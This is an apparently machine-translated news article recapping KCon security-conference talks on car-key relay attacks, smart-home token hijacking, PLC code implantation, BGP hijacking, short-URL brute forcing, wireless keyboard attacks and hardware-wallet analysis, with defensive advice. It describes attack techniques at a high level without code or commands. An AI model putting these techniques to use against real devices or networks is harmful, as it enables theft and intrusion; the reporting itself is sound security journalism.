Home > Article > Memory card, smart home hijacked, short URL attack, what did KCon do this time?

Memory card, smart home hijacked, short URL attack, what did KCon do this time?

In many people's minds, hackers are lonely swordsmen. They roam between the cyber world, hide behind the IP, and use their own nicknames to fight on their own.

If there is anything that can bring this group of rangers together, KCon is one.

Whether it's setting or dry goods issues or rock music, there is always a place to capture this group of individual surfers.

KCon, which is already held for the seventh time, has set the theme as "fusion·change" this year. The organizer knows that Chuangyu CEO Zhao Wei explained, "KCon is different from traditional security conferences. It is not a business conference, but an exchange. Platform. Gather everyone’s wisdom and radiate greater energy."

So, follow the editor of Leifeng.com to take a look at the highlights of this alternative sorority meeting.

Grand Theft Auto - Digital Key Hacking

Perhaps machinery will always attract hackers, anyway, there are fancy attacks against cars at hacker conferences all over the world.

In this meeting, the security researcher Kevin2600 of Yinji also took aim at the topic of automobile safety. Kevin shared three attack methods to attack it:

1. RF attack. Since the communication between the key and the car is one-way, there is no dynamic authentication process, and the attacker can interfere with the communication between the mobile phone and the car key.

Hacker Samy Kamkar once demonstrated this kind of operation on the stage of DefCon, and the "tool for crime" he used was Rolljam.

The thieves use the jammer to prevent the car from receiving the key signal, save the key signal by themselves, and then use it to open the door. The same key and different operations share a rolling code sequence, but "RollJam" successfully broke the rolling code safety protection measures. .

It can be hidden on the target vehicle or in the garage, waiting for the unknowing car owner to press the wireless key to unlock the door. But then the owner will find that there is no unlocking sound for the first time, but it succeeds again after trying again. After that, Samy Kamkar can retrieve "RollJam" anytime, anywhere, and press a button on the device to open the door.

2. Sharing function attacks. When a user uses WeChat or other methods to share key information with relatives and friends, an attacker can easily obtain it.

3. Bluetooth encryption cracking. This is simpler and more rude. Communication information can be obtained directly by capturing packets, and sensitive data can be directly stolen.

Car keys have gone through the development process from mechanical keys, to remote control, to FRID, and then to digital keys. It is a future trend for mobile phones to become keys, but people have to worry about its safety.

Smart home security-identity hijacking

Smart homes have entered thousands of households. Once identity hijacking occurs, it may cause privacy-sensitive information leakage, property losses, and even the dangers of equipment being arbitrarily controlled and monitored.

Taking smart speakers, smart sockets and other devices as examples, Bai Zhongyin, a senior security engineer at Baidu, used "identity hijacking" to achieve arbitrary remote control of devices and products by citing account synchronization methods and device interaction methods of three manufacturers.

Generally speaking, account synchronization depends on whether the device is legal and verifying the device ID (key). The second is whether the token is transmitted safely, whether the device is online or via Bluetooth or AP. Identity hijacking can be carried out in the process.

For example, the speaker of manufacturer A sends the identity information on the UDP255.255.255.255:50000 port through a fixed "protocol" format. The attacker can monitor the UDP50000 port to obtain the userid and token of the user and steal the identity credentials. . Voice transmission is also sent in accordance with the same set of fixed "protocol" format.

As for the hijacking during device interaction, Dai Zhongyin summarized and compared manufacturers A, B, and C.

In smart home APP applications, the security issues of Webview JS interactive interface and Webview file domain application cloning will lead to security risks such as identity information leakage.

Dai Zhongyin also told the editor of Leifeng.com that they have reported the discovered vulnerabilities to vendors A, B, and C, and all three vendors have completed repairs.

Industrial network security-the realization of a certain PLC remote control

The TSMC virus incident that occurred not long ago once again placed the issue of industrial control safety before the public. The PLC (Programmable Logic Controller) in the industrial control network has always been in an isolated network, but with the development of the Internet, more and more companies connect it to the Internet, but there are many Security Question.

By sharing the use of Snap7 and Step7, Jian Siting realized the connection and programming for a certain brand of PLC. In this way, the PLC remote control code implantation will not cause the PLC to restart and silently, thereby enhancing the concealment of the attack.

So what are the defensive measures? Jian Siting shared five aspects:

To ensure physical and environmental safety, this is also the most effective measure;

Encrypt PLC access authorization and project;

Add a DPI firewall at the PLC exit to prohibit downloading to the PLC;

The core firewall cuts off the direct access of the industrial network and sets the DMZ zone;

Increase the access authentication and authorization.

BGP security crisis

From 2003 to 2018, dozens of well-known major security incidents occurred worldwide due to BGP's own security flaws.

In 2003, part of Northrop Grumman's bgp network was maliciously exploited;

In 2008, Pakistan Telecom caused YouTube disconnection;

In 2015, Hacking Team used BGP Hijack to assist the Italian hacker groups in their attacks;

In 2017, a Google engineer misconfigured 8 million users in Japan to disconnect from the Internet for 1 hour;

In 2018, Amazon was hijacked by BGP and ETH worth $17.3 million was stolen.

In the words of Zhang Yubing, a senior security researcher at 360 Threat Intelligence Center, BGPv4 security flaws are the largest and most serious existing security vulnerabilities in the global Internet.

BGP (Border Gateway Protocol) corresponds to the Chinese border gateway protocol, which is a core Internet decentralized autonomous routing protocol on the Internet. There are three main attack methods against the current BGP protocol, namely, BGP prefix hijacking, AS Path hijacking, and route leakage.

BGP prefix hijacking is divided into three hijacking methods:

Idle AS snatching refers to the hijacking of an unannounced network that does not belong to oneself but is legalized by other organizations.

Neighbor AS communication snatching refers to hijacking the neighboring network by using the physical address to be close to the network that does not belong to one's own.

Long mask preemption (siphon effect) refers to the use of BGP line long mask priority feature to hijack all reachable network segments and full traffic.

AS Path hijacking can be arbitrarily modified by using AS_PATH prepend. The routing priority can be reduced by increasing the number of AS traverses, and data traffic can be rushed to the target network for hijacking.

BGP route leaks. BGP routing entries have their reasonable communication ranges in different roles. Once the BGP routing communication spreads beyond its original expected communication range, it is called route leakage. This will produce unpredictable results, such as causing a network. Interruption, the source network and the targeted network are interrupted or cause AS traversal/ISP traversal/MITM and other issues.

In addition, TTL modify in BGP may also have security vulnerabilities. Because it supports custom modifications, TTL can be modified to make the number of hops normal during a man-in-the-middle attack, thereby enhancing the concealment of the attack.

At present, the current situation of the communication security of Internet nodes in my country is not optimistic. More than 50% of the exposed data is not encrypted. In addition, the vulnerability of the encryption protocol, the downgrading of the encrypted communication trust relationship and the scope of the software and hardware-level supply chain attacks are affected. It is still not safe for the next 5 to 10 years.

Attack and defense of short URL

As a contemporary civilized surfer, he is very familiar with short URLs. It originated from some services such as Weibo with word limit, and is now widely used in text messages and emails. According to incomplete statistics, 80% of vendors use short link services provided by third parties or themselves. However, it seems that few people pay attention to the security of short links.

The short address service can provide a very short URL to replace the original possibly longer URL and shorten the long URL address. When users visit the shortened URL, they will usually be redirected to the original URL.

The Yanxiu team of Tencent Blade team analyzed the 10 short URL open source projects with the largest number of stars on GITHUB. The conversion algorithms are roughly divided into three categories: hexadecimal algorithm, HASH algorithm and random number algorithm. According to the algorithm, the attack conjectures and tests, and the blasting practice obtained personal information, contract information, password information and other information.

The attack surface of extended short URLs is much more than that. As the application becomes more and more widespread, the remote access function will cause SSRF if the filtering is not strict; obtaining the TITLE function and displaying the long URL page will cause XSS if the filtering is not strict.

Of course, Yan Xiu also proposed several remedial measures, such as:

1. Increase the restriction on the frequency of single IP access and the total amount of single IP access, and block if it exceeds the threshold;

2. Expiration processing for short URLs containing permissions and sensitive information;

3. Add secondary authentication to long URLs containing permissions and sensitive information.

4. Do not use short URL services to convert any long URLs that contain sensitive information and permissions;

5. Try to avoid using authentication methods such as plaintext tokens.

Recognize the "black" tracing within the access card

How to obtain a memory sample of a crime scene for suspect tracking? Real technology is far more cumbersome than blockbusters.

Wu Zhibo, a security expert from China Net Security·Guangzhou Three Zero Guards, shared a real crime investigation case at the scene. The website of a certain unit was tampered with, and the on-site investigation found that the log was cleared. Through the streaming backup configured by the accesslog, a complete and complete case was found. For the undistorted copy, analyzing the log guessed that "hackers are controlled by the reverse connection shell", through extracting memory and reverse analysis, they found a relatively rare attack method-logic bomb, and finally found the entrance to arrest the suspect.

Radio frequency attack-from keyboard hook Trojan to wireless keyboard and mouse suit hijacking

The keyboard is a good thing, but it's a pity that thieves are always thinking about it. Earlier on, Leifeng.com (Public Account: Leifeng.com) reported an incident where the virtual keyboard AI.type leaked 31 million user information. As a daily input tool, once the keyboard is monitored or controlled by an attacker, personal privacy is very high. Shang is exposed to the attacker's eyes.

Specifically, past attacks often used keyboard hook Trojan horses, but now there are many wireless keyboards on the market, wireless has invisibly expanded its attack surface, and the keyboard entity has been introduced into the attack chain through radio frequency technology. There are already some attacks against wireless keyboards, most of which use radio frequency communication technology to attack common wireless keyboard and mouse sets.

Of course, the speaker Shi Bing also gave some security measures. For example, for users, it is recommended to switch to a secure soft keyboard for sensitive operations, instead of using substandard keyboards and adapters from small factories to improve wireless security awareness and understand basic parameters. Information, support firmware upgrade for devices that update firmware;

For manufacturers, it is recommended to introduce a serial number to change the radio signal at a time; use serial number + encryption to encrypt the serial number to increase the attack cost and difficulty of the attacker.

Security analysis of digital wallet

This issue is not the first time it has been made public. Not long ago, it appeared on the Kanxue Developer Forum. The speaker Hu Mingde brought two friends Fu Pengfei and Sun Haoran to the KCcon stage and added new content.

The first is the analysis of hardware design: hardware design, firmware information, storage data and related hardware settings. Then there is the analysis of chip security: there is a vulnerability in a certain brand of chipset, which can be used to achieve privilege escalation and obtain sensitive information, turn on USB debugging, change IMEI and even burn your own Android system.

In view of the security analysis of foreign mainstream hardware wallets, one is the memory structure analysis of the STM32 series of chips, the analysis of the memory protection mechanism, and the method of over-memory protection mechanism. The second is the corresponding analysis of firmware and code. The third is hardware security design analysis. Then the team showed the idea of ​​attacking the MCU that can be tampered with. In the next step, the team will study the security issues of a larger number of hardware wallets, and at the same time will conduct security research on software wallets, focusing more on wallet security.